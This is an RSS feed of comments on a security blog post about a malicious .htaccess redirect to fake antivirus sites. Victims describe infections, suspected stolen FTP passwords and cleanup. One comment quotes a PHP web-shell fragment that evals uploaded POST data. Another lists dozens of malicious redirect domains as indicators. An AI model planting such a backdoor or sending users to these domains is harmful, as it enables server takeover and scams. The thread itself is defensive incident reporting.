<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Unmasking the Antivirus 2009 .htaccess Exploit.</title>
	<atom:link href="http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/</link>
	<description>Website insecurity by example</description>
	<lastBuildDate>Sat, 20 Mar 2010 16:18:55 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Antivirus</title>
		<link>http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/comment-page-1/#comment-6826</link>
		<dc:creator>Antivirus</dc:creator>
		<pubDate>Thu, 04 Mar 2010 20:24:35 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=15#comment-6826</guid>
		<description>I would recommend anyone who thinks they may be infected with the viruses this spreads, to do a complete OS re-install. This is the most thorough way of cleaning infections from your system, because some of these bugs really borough deep into the code.</description>
		<content:encoded><![CDATA[<p>I would recommend anyone who thinks they may be infected with the viruses this spreads, to do a complete OS re-install. This is the most thorough way of cleaning infections from your system, because some of these bugs really borough deep into the code.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: alx</title>
		<link>http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/comment-page-1/#comment-1460</link>
		<dc:creator>alx</dc:creator>
		<pubDate>Thu, 18 Jun 2009 17:52:58 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=15#comment-1460</guid>
		<description>Hi again,

Just found out a new thing. Looking at my Status and Errors Report I find that somebody tried to access this file ( beta/img/.svn/tmp/ugatef.php ) 4 times.

I look at the Date Over Time report of that file and I see that it is 4 times the same day.

I download all the logs from that day and search for the file ugatef.php.

After the 4 attemps I see that somebody access another file that shouldn&#039;t be on my structure ( /newsletter/content/aceheg.php ).

In this file I find PHP code with these lines:

(...)

if (md5($_POST[&quot;p&quot;])==&quot;aace99428c50dbe965acc93f3f275cd3&quot;){ if ($code = @fread(@fopen($HTTP_POST_FILES[&quot;f&quot;][&quot;tmp_name&quot;],&quot;rb&quot;),$HTTP_POST_FILES[&quot;f&quot;][&quot;size&quot;])){ eval($code);

(...)

If I understand correctly, from here a maliciuos user can execute PHP code as POST from a remote HTML form.

Contact me if you want more info.

Thanks,
alx</description>
		<content:encoded><![CDATA[<p>Hi again,</p>
<p>Just found out a new thing. Looking at my Status and Errors Report I find that somebody tried to access this file ( beta/img/.svn/tmp/ugatef.php ) 4 times.</p>
<p>I look at the Date Over Time report of that file and I see that it is 4 times the same day.</p>
<p>I download all the logs from that day and search for the file ugatef.php.</p>
<p>After the 4 attemps I see that somebody access another file that shouldn&#8217;t be on my structure ( /newsletter/content/aceheg.php ).</p>
<p>In this file I find PHP code with these lines:</p>
<p>(&#8230;)</p>
<p>if (md5($_POST["p"])==&#8221;aace99428c50dbe965acc93f3f275cd3&#8243;){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],&#8221;rb&#8221;),$HTTP_POST_FILES["f"]["size"])){ eval($code);</p>
<p>(&#8230;)</p>
<p>If I understand correctly, from here a maliciuos user can execute PHP code as POST from a remote HTML form.</p>
<p>Contact me if you want more info.</p>
<p>Thanks,<br />
alx</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: alx</title>
		<link>http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/comment-page-1/#comment-1457</link>
		<dc:creator>alx</dc:creator>
		<pubDate>Thu, 18 Jun 2009 16:12:26 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=15#comment-1457</guid>
		<description>Hi, the same thing happend to our website.
After a lot of searching we discovered the .htaccess and a rewrite to a fake blog in my server that had a javascript redirect to http:// scanpcsecurity . com

The first time it happend I changed all the passwords, desactivated ssh access and disabled all ftp users.

I am a Mac user and I stored the new password as text in my ftp application Cyberduck.

I am still trying to figure out how it happened.</description>
		<content:encoded><![CDATA[<p>Hi, the same thing happend to our website.<br />
After a lot of searching we discovered the .htaccess and a rewrite to a fake blog in my server that had a javascript redirect to http:// scanpcsecurity . com</p>
<p>The first time it happend I changed all the passwords, desactivated ssh access and disabled all ftp users.</p>
<p>I am a Mac user and I stored the new password as text in my ftp application Cyberduck.</p>
<p>I am still trying to figure out how it happened.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Anand</title>
		<link>http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/comment-page-1/#comment-1410</link>
		<dc:creator>Anand</dc:creator>
		<pubDate>Wed, 10 Jun 2009 17:06:03 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=15#comment-1410</guid>
		<description>Thanks a lot for this great article! and keep writing!

Regards,
Anand</description>
		<content:encoded><![CDATA[<p>Thanks a lot for this great article! and keep writing!</p>
<p>Regards,<br />
Anand</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Aravindan C</title>
		<link>http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/comment-page-1/#comment-445</link>
		<dc:creator>Aravindan C</dc:creator>
		<pubDate>Tue, 24 Mar 2009 10:41:14 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=15#comment-445</guid>
		<description>Hi,

Thank you very much for this information. My website was leading to a malious site when it is searched on Yahoo / Google etc., but it worked fine if we type the name in the address bar. I was totally confused and after reading your article i found that there was an .htaccess exactly as mentioned above that redirects all my search engine traffic to 87 .248.180.90

Now that i removed that entry, my website is back to normal on the search engines.

Thanks again for this article.

Regards,
Aravind. C</description>
		<content:encoded><![CDATA[<p>Hi,</p>
<p>Thank you very much for this information. My website was leading to a malious site when it is searched on Yahoo / Google etc., but it worked fine if we type the name in the address bar. I was totally confused and after reading your article i found that there was an .htaccess exactly as mentioned above that redirects all my search engine traffic to 87 .248.180.90</p>
<p>Now that i removed that entry, my website is back to normal on the search engines.</p>
<p>Thanks again for this article.</p>
<p>Regards,<br />
Aravind. C</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Mr Helpful</title>
		<link>http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/comment-page-1/#comment-50</link>
		<dc:creator>Mr Helpful</dc:creator>
		<pubDate>Wed, 28 Jan 2009 16:43:14 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=15#comment-50</guid>
		<description>We’ve seen this type of attack here at work as well. Please see my comment (once moderated) on http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/

the root cause is the same, hijacked ftp accounts.</description>
		<content:encoded><![CDATA[<p>We’ve seen this type of attack here at work as well. Please see my comment (once moderated) on <a href="http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/" rel="nofollow">http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/</a></p>
<p>the root cause is the same, hijacked ftp accounts.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis</title>
		<link>http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/comment-page-1/#comment-46</link>
		<dc:creator>Denis</dc:creator>
		<pubDate>Tue, 27 Jan 2009 18:02:51 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=15#comment-46</guid>
		<description>To avoid clutter, I will be adding new domain names of redirect sites and bogus Antivirus sites in this comment.

softwarforgoodusers .cn
frenchfriestaste .cn
tourinternetgide .cn
latenightclick .cn
profileduser .cn
browserpower .cn
fulldeposite .cn
hollywoodstarsnow .cn
securityadvertisement .cn
intendyoseeyou .cn
softwaretripsgoeshere .cn
discostylepromo .cn
someonestrails .cn
refereruser .cn
orderyourdream .cn
gonesurfing .cn
worldwidesphere .cn
getluckywebpagepromo .cn
activeusersearch .cn
styleout .cn
goingdignity .cn
wintertimessport .cn
lostdomains .cn
toplevelawards .cn
hairstylezone .cn
bestgossips .cn
perfectclicks .cn
greatwallnitro .cn
controlledsurfaces .cn
pleasentsurfing .cn
saturationpower .cn
fordgreatcars .cn
teafuntrip .cn
getveryluckytoday .cn
prideandglorynow .cn
worldcommercialbusiness .cn
constructorwebspace .cn
alaskatoursonline .cn
softwareoverworld .cn
tabletpccomputing .cn
securedradiostation .cn

high-protection .info

computerantiviruslivescanner .com
rapidantivirusonlinescan .com
pro-antispyware-scanner .com
premium-antivirus-scan .com
premiumonlinescanner .com
bestanti-virusscan .com
fast-antispyware-scan .com
fastantispywarescanner .com
fast-antivirus-pro-scan .com
antispywareonlinescanner .com
antispywareprolivescan .com
antispywareliveproscan .com
antispywareprolivescanner .com
antispywareinternetproscan .com
antispyware-internet-scan .com
antispyware-premium-scan .com
antispyware-live-pro-scan .com
antispyware-online-scan .com
bestantispywarescan .com
bestantispywarelivescan .com
computerantivirusscanner .com
computerantivirusproscan .com
antimalware-pro-scanner .com
anti-malware-pro-scanner .com
anti-malware-pro-scan .com
antimalware-live-scanner .com
antimalwareliveproscanner .com
antimalwareliveproscanner .com
antimalwareliveproscan .com
antimalware-online-scanner .com
premiumantiviruscheck .com
antimalwaresuperscanner .com
onlineantivirusproscan .com
bestantimalwaredefence .com
liteantispywareproscanner .com
liteantimalwarescanner .com
lite-anti-virus-scan .com
liveantimalwarescan .com
liveantimalwarefastscnan .com
pro-antimalware-scanner .com
fastantimalwareproscanner .com
best-antimalware-pro-scan .com
bestantimalwarelivescanner .com</description>
		<content:encoded><![CDATA[<p>To avoid clutter, I will be adding new domain names of redirect sites and bogus Antivirus sites in this comment.</p>
<p>softwarforgoodusers .cn<br />
frenchfriestaste .cn<br />
tourinternetgide .cn<br />
latenightclick .cn<br />
profileduser .cn<br />
browserpower .cn<br />
fulldeposite .cn<br />
hollywoodstarsnow .cn<br />
securityadvertisement .cn<br />
intendyoseeyou .cn<br />
softwaretripsgoeshere .cn<br />
discostylepromo .cn<br />
someonestrails .cn<br />
refereruser .cn<br />
orderyourdream .cn<br />
gonesurfing .cn<br />
worldwidesphere .cn<br />
getluckywebpagepromo .cn<br />
activeusersearch .cn<br />
styleout .cn<br />
goingdignity .cn<br />
wintertimessport .cn<br />
lostdomains .cn<br />
toplevelawards .cn<br />
hairstylezone .cn<br />
bestgossips .cn<br />
perfectclicks .cn<br />
greatwallnitro .cn<br />
controlledsurfaces .cn<br />
pleasentsurfing .cn<br />
saturationpower .cn<br />
fordgreatcars .cn<br />
teafuntrip .cn<br />
getveryluckytoday .cn<br />
prideandglorynow .cn<br />
worldcommercialbusiness .cn<br />
constructorwebspace .cn<br />
alaskatoursonline .cn<br />
softwareoverworld .cn<br />
tabletpccomputing .cn<br />
securedradiostation .cn</p>
<p>high-protection .info</p>
<p>computerantiviruslivescanner .com<br />
rapidantivirusonlinescan .com<br />
pro-antispyware-scanner .com<br />
premium-antivirus-scan .com<br />
premiumonlinescanner .com<br />
bestanti-virusscan .com<br />
fast-antispyware-scan .com<br />
fastantispywarescanner .com<br />
fast-antivirus-pro-scan .com<br />
antispywareonlinescanner .com<br />
antispywareprolivescan .com<br />
antispywareliveproscan .com<br />
antispywareprolivescanner .com<br />
antispywareinternetproscan .com<br />
antispyware-internet-scan .com<br />
antispyware-premium-scan .com<br />
antispyware-live-pro-scan .com<br />
antispyware-online-scan .com<br />
bestantispywarescan .com<br />
bestantispywarelivescan .com<br />
computerantivirusscanner .com<br />
computerantivirusproscan .com<br />
antimalware-pro-scanner .com<br />
anti-malware-pro-scanner .com<br />
anti-malware-pro-scan .com<br />
antimalware-live-scanner .com<br />
antimalwareliveproscanner .com<br />
antimalwareliveproscanner .com<br />
antimalwareliveproscan .com<br />
antimalware-online-scanner .com<br />
premiumantiviruscheck .com<br />
antimalwaresuperscanner .com<br />
onlineantivirusproscan .com<br />
bestantimalwaredefence .com<br />
liteantispywareproscanner .com<br />
liteantimalwarescanner .com<br />
lite-anti-virus-scan .com<br />
liveantimalwarescan .com<br />
liveantimalwarefastscnan .com<br />
pro-antimalware-scanner .com<br />
fastantimalwareproscanner .com<br />
best-antimalware-pro-scan .com<br />
bestantimalwarelivescanner .com</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis</title>
		<link>http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/comment-page-1/#comment-45</link>
		<dc:creator>Denis</dc:creator>
		<pubDate>Tue, 27 Jan 2009 01:59:00 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=15#comment-45</guid>
		<description>I have more and more evidence that this has to do with compromised passwords.
What FTP program did your friend use? Did he store the password in it or typed it in on every login?
Is he on Mac or PC or Linux?</description>
		<content:encoded><![CDATA[<p>I have more and more evidence that this has to do with compromised passwords.<br />
What FTP program did your friend use? Did he store the password in it or typed it in on every login?<br />
Is he on Mac or PC or Linux?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Steerpike</title>
		<link>http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/comment-page-1/#comment-44</link>
		<dc:creator>Steerpike</dc:creator>
		<pubDate>Tue, 27 Jan 2009 01:39:36 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=15#comment-44</guid>
		<description>Thanks a lot!  My friend&#039;s website was hacked with this.  Interestingly, his .htaccess file was already protected (644) so the only other possibilities are that his (shared) hosting service was hacked, or, his password was hacked (it was &#039;moderately strong&#039; - Upper case, lower case, numbers, etc - though the letters were dictionary entries (similar to Bird54bird - would that be easily hacked?)

Every directory in the site had a .htaccess.mal file, which seemed to be a copy of the bad .htaccess file, ready to be copied back perhaps.</description>
		<content:encoded><![CDATA[<p>Thanks a lot!  My friend&#8217;s website was hacked with this.  Interestingly, his .htaccess file was already protected (644) so the only other possibilities are that his (shared) hosting service was hacked, or, his password was hacked (it was &#8216;moderately strong&#8217; &#8211; Upper case, lower case, numbers, etc &#8211; though the letters were dictionary entries (similar to Bird54bird &#8211; would that be easily hacked?)</p>
<p>Every directory in the site had a .htaccess.mal file, which seemed to be a copy of the bad .htaccess file, ready to be copied back perhaps.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis</title>
		<link>http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/comment-page-1/#comment-14</link>
		<dc:creator>Denis</dc:creator>
		<pubDate>Tue, 13 Jan 2009 10:30:54 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=15#comment-14</guid>
		<description>Disabling the RewriteEngine will help until hackers modify/replace your .htaccess file next time.

The better solution would be remove the malicious code from the .htaccess file and make it write-protected.

Make sure to check the rest &lt;a href=&quot;http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/&quot; rel=&quot;nofollow&quot;&gt;instructions&lt;/a&gt;</description>
		<content:encoded><![CDATA[<p>Disabling the RewriteEngine will help until hackers modify/replace your .htaccess file next time.</p>
<p>The better solution would be remove the malicious code from the .htaccess file and make it write-protected.</p>
<p>Make sure to check the rest <a href="http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/" rel="nofollow">instructions</a></p>
]]></content:encoded>
	</item>
</channel>
</rss>
